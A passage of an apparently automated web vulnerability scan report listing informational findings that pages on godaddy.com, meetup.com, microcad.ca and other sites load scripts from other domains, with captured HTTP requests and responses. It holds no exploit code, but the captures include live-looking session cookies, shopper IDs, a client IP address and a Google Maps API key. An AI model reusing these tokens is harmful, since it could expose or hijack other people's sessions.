http://munchkin.marketo.net/munchkin.js
https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js

Request

GET /Resources/Wiki/page/Compression.aspx HTTP/1.1
Host: www.dotnetnuke.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=compression+dotnetnuke
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=-XEtudygzAEkAAAAYzg2YjJlYjMtYTFkZi00NmMxLTgzOWYtY2FmYWRiODU3NzNh0; DotNetNukeAnonymous=f883d1f7-81b9-4b4d-ae65-fb5226b390bd; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: DotNetNukeAnonymous=f883d1f7-81b9-4b4d-ae65-fb5226b390bd; expires=Sat, 03-Sep-2011 15:25:19 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=f883d1f7-81b9-4b4d-ae65-fb5226b390bd; expires=Sat, 03-Sep-2011 15:25:19 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 15:05:19 GMT
Content-Length: 71110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...
<link id="APortals_25_portal_css" rel="stylesheet" type="text/css" href="/Portals/25/portal.css?3653717" /><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" ></script>
...[SNIP]...
<body id="Body">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js" ></script>
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript" ></script>
...[SNIP]...

18.266. http://www.godaddy.com/Payment/payment-options.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/Payment/payment-options.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2
http://img3.wsimg.com/fos/script/sales16.min.js
http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

Request

Response

18.267. http://www.godaddy.com/affiliates/affiliate-program.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/affiliates/affiliate-program.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2
http://img3.wsimg.com/fos/script/atlantis_jquery8.min.js
http://img3.wsimg.com/fos/script/sales16.min.js
http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:25:55 GMT
Content-Length: 98753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">

<script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
...[SNIP]...
</div>

<script src="http://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"></script>

<script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"></script>
...[SNIP]...

18.268. http://www.godaddy.com/gdshop/offers/cross_sell.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/gdshop/offers/cross_sell.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js
http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

Request

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response

18.269. http://www.godaddy.com/ssl/ssl-certificates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/ssl-certificates.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2
http://img3.wsimg.com/fos/script/atlantis_jquery7.min.js
http://img3.wsimg.com/fos/script/sales16.min.js
http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:28:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=ci=8346&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=wgegihwbqjtcqjfhsblalayejedfpbid; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:28:59 GMT
Content-Length: 133386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">

<script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
...[SNIP]...
</div>

<script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"></script>

<script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"></script>
...[SNIP]...


<script src="http://img3.wsimg.com/fos/script/atlantis_jquery7.min.js" type="text/javascript"></script>
...[SNIP]...

18.270. http://www.hostnj.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostnj.net
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js?ver=3.2.1
http://apis.google.com/js/plusone.js?ver=1.0.0
http://s.gravatar.com/js/gprofiles.js?w&ver=3.2.1
http://stats.wordpress.com/e-201135.js
http://w.sharethis.com/button/buttons.js?ver=3.2.1
http://www.shrinktheweb.com/scripts/pagepix.js?ver=3.2.1
https://connect.facebook.net/en_US/all.js
https://platform.twitter.com/widgets.js

Request

Response

18.271. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostnj.net
Path:	/products-page/ssl-security/comodo-intranet-ssl-certificate/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js?ver=3.2.1
http://apis.google.com/js/plusone.js?ver=1.0.0
http://s.gravatar.com/js/gprofiles.js?w&ver=3.2.1
http://stats.wordpress.com/e-201135.js
http://w.sharethis.com/button/buttons.js?ver=3.2.1
http://www.shrinktheweb.com/scripts/pagepix.js?ver=3.2.1
https://connect.facebook.net/en_US/all.js
https://platform.twitter.com/widgets.js

Request

GET /products-page/ssl-security/comodo-intranet-ssl-certificate/ HTTP/1.1
Host: www.hostnj.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

18.272. http://www.meetup.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAsy0hHdLv8lt7dUhh_8Q2nhT9dWrIyy2PXg-qM7aW-4MZzb3j6xQO9Ylaxb0g9dvE--f66B7pFHaapg
http://static1.meetupstatic.com/639383059036522848068866/script/jquery/Meetup/home.js
http://static2.meetupstatic.com/6713571223805153701/script/jquery/Meetup/FreeformLocation.js
http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js
http://static2.meetupstatic.com/911852152585054155757/script/Meetup/packed/Meetup.Base.jquery.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:12:08 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app3.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: 0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 57229
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www.w3.org/1999/
...[SNIP]...
</title>


                                                               <script src="http://static2.meetupstatic.com/911852152585054155757/script/Meetup/packed/Meetup.Base.jquery.js" type="text/javascript"></script>
...[SNIP]...
<input type="hidden" name="gcResults" />

<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAsy0hHdLv8lt7dUhh_8Q2nhT9dWrIyy2PXg-qM7aW-4MZzb3j6xQO9Ylaxb0g9dvE--f66B7pFHaapg" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://static2.meetupstatic.com/6713571223805153701/script/jquery/Meetup/FreeformLocation.js" type="text/javascript"></script>

<script src="http://static1.meetupstatic.com/639383059036522848068866/script/jquery/Meetup/home.js" type="text/javascript"></script>
...[SNIP]...
</script>

                                                                                               <script type="text/javascript" src="http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js"></script>
...[SNIP]...

18.273. http://www.meetup.com/Boston-BizSpark-Meetup/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/Boston-BizSpark-Meetup/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static1.meetupstatic.com/21630557349110923/script/Meetup/packed/grouphome.js
http://static2.meetupstatic.com/377588384545881799359/script/jquery/Meetup/Notifier.js
http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js
http://static2.meetupstatic.com/911852152585054155757/script/Meetup/packed/Meetup.Base.jquery.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:39 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app3.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: 0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 123500
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www.w3.org/1999
...[SNIP]...
</script>


                                       <script src="http://static2.meetupstatic.com/911852152585054155757/script/Meetup/packed/Meetup.Base.jquery.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://static1.meetupstatic.com/21630557349110923/script/Meetup/packed/grouphome.js" type="text/javascript"></script>

<script src="http://static2.meetupstatic.com/377588384545881799359/script/jquery/Meetup/Notifier.js" type="text/javascript"></script>
...[SNIP]...
</script>

                                                                                               <script type="text/javascript" src="http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js"></script>
...[SNIP]...

18.274. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/Boston-BizSpark-Meetup/events/30620321/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js
http://static2.meetupstatic.com/8704924972958579520499/script/Meetup/packed/details.js
http://static2.meetupstatic.com/911852152585054155757/script/Meetup/packed/Meetup.Base.jquery.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:34 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app12.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 100873
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www
...[SNIP]...
</title>


                                                               <script src="http://static2.meetupstatic.com/911852152585054155757/script/Meetup/packed/Meetup.Base.jquery.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://static2.meetupstatic.com/8704924972958579520499/script/Meetup/packed/details.js" type="text/javascript"></script>
...[SNIP]...
</script>

                                                                                               <script type="text/javascript" src="http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js"></script>
...[SNIP]...

18.275. http://www.meetup.com/sponsorships/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/sponsorships/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static1.meetupstatic.com/7703199429616231551502/script/Meetup/packed/Meetup.Base.js
http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:49 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app16.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 21124
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www.w3.org/1999/
...[SNIP]...
</title>


                                                                           <script src="http://static1.meetupstatic.com/7703199429616231551502/script/Meetup/packed/Meetup.Base.js" type="text/javascript"></script>
...[SNIP]...
</script>

                                                                                               <script type="text/javascript" src="http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js"></script>
...[SNIP]...

18.276. http://www.meetup.com/whats_new/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/whats_new/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static1.meetupstatic.com/11611154067560584650/script/Meetup/DiscreteBalloon.js
http://static1.meetupstatic.com/7703199429616231551502/script/Meetup/packed/Meetup.Base.js
http://static2.meetupstatic.com/2351297749010698739264/script/Meetup/PageHelpers/new_features.js
http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js
http://static2.meetupstatic.com/99619063252217129168/script/Meetup/DiscreteBase.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:59 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC"
X-Meetup-server: app5.int.meetup.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 29767
Connection: close

                                                                               <!DOCTYPE html>

                                                                               <html xmlns="http://www.w3.org/1999/
...[SNIP]...
</title>


                                                                           <script src="http://static1.meetupstatic.com/7703199429616231551502/script/Meetup/packed/Meetup.Base.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://static2.meetupstatic.com/99619063252217129168/script/Meetup/DiscreteBase.js" type="text/javascript"></script>

<script src="http://static1.meetupstatic.com/11611154067560584650/script/Meetup/DiscreteBalloon.js" type="text/javascript"></script>

<script src="http://static2.meetupstatic.com/2351297749010698739264/script/Meetup/PageHelpers/new_features.js" type="text/javascript"></script>
...[SNIP]...
</script>

                                                                                               <script type="text/javascript" src="http://static2.meetupstatic.com/69605940648720797428/script/Meetup/Facebook2.js"></script>
...[SNIP]...

18.277. http://www.microcad.ca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microcad.ca
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js
https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85

Request

GET / HTTP/1.1
Host: www.microcad.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/cart
Cookie: __utma=84250501.2042030074.1315086290.1315086290.1315086290.1; __utmb=84250501.1.10.1315086290; __utmc=84250501; __utmz=84250501.1315086290.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; mf_user=1; mf_session=4e87f0f1cb4f46f4e1b2fa6bef28da0f; mf_lastpageview=1315086344049

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:53:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16620
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Microcad.ca | Hom
...[SNIP]...
<p id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85"></script>
...[SNIP]...

<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"></script>
...[SNIP]...

18.278. http://www.microcad.ca/cart previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microcad.ca
Path:	/cart

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js
https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:34:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 16422
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Microcad.ca | Sho
...[SNIP]...
<p id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85"></script>
...[SNIP]...

<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"></script>
...[SNIP]...

18.279. http://www.microcad.ca/customerservice/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microcad.ca
Path:	/customerservice/about

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js
https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85

Request

GET /customerservice/about HTTP/1.1
Host: www.microcad.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/
Cookie: __utma=84250501.2042030074.1315086290.1315086290.1315086290.1; __utmb=84250501.2.10.1315086290; __utmc=84250501; __utmz=84250501.1315086290.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; mf_user=1; mf_session=4e87f0f1cb4f46f4e1b2fa6bef28da0f; mf_lastpageview=1315086347664; public=e77qnk450jm0pd8tjrlbgok540

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:53:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 17025
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Microcad.ca | Abo
...[SNIP]...
<p id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85"></script>
...[SNIP]...

<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"></script>
...[SNIP]...

18.280. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microcad.ca
Path:	/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js
https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85

Request

Response

18.281. https://www.microcad.ca/auth/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microcad.ca
Path:	/auth/login

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js
https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:35:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14105
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Microcad.ca | Log
...[SNIP]...
<p id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=J1AC4JSCyRkHT7RkNR74WDnAE6gCXcX7GcaWPukWaY1iN1vWF7f2CMS85"></script>
...[SNIP]...

<script type="text/javascript" language="javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
